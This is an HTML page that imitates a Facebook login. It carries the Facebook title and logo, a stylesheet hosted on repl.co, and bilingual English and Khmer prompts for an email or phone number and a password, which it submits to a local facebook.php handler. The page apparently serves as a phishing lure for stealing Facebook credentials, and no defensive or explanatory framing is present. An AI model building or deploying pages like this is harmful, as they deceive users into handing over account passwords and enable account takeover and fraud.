<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Facebook</title>
    <link href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/1200px-Facebook_f_logo_%282019%29.svg.png" rel="icon">
    <link href="https://System.datafiles.repl.co/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
  <center>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/1200px-Facebook_f_logo_%282019%29.svg.png" height="100px" width="100px">
    <form action="/facebook.php">
      <p>Email or Phone Number:</p><br>
      <p>អ៊ីមែលឬលេខទូរស័ព្ទ៖</p><br>
      <input type="text" name="Facebook_Email_Phone_Number"><br>
      <p>Password:</p><br>
      <p>ពាក្យសម្ងាត់៖</p><br>
      <input type="text" name="Password"><br>
      <input type="submit" value="Submit"><br>

      </form>
  </center>
</body>
</html>
